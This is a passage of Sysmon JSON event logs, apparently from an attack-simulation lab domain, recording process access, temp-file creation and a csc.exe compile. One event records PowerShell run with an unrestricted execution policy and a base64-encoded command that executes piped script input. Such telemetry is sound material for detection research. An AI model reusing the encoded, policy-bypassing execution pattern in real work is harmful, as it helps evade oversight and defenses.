C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4786,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4787,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.567\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C0-5F25-0000-0010A58F0600}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.567","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C0-5F25-0000-0010A58F0600}","TargetProcessId":"5032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4788,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:54:56.677\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nProcessId: 1576\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\u1pdf52i.dll\r\nCreationUtcTime: 2020-08-01 06:54:56.677","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:54:56.677","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\u1pdf52i.dll","CreationUtcTime":"2020-08-01 06:54:56.677","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4789,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.677\r\nProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nProcessId: 1576\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\u1pdf52i.cmdline\r\nCreationUtcTime: 2020-08-01 06:54:56.677","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.677","ProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\u1pdf52i.cmdline","CreationUtcTime":"2020-08-01 06:54:56.677","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4790,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.686\r\nProcessGuid: {E2A3D6B1-11C0-5F25-0000-0010B2910600}\r\nProcessId: 2312\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\u1pdf52i.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {E2A3D6B1-11BF-5F25-0000-0010A17E0600}\r\nParentProcessId: 1576\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.686","ProcessGuid":"{E2A3D6B1-11C0-5F25-0000-0010B2910600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\u1pdf52i.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{E2A3D6B1-11BF-5F25-0000-0010A17E0600}","ParentProcessId":"1576","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4791,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4792,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4793,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime"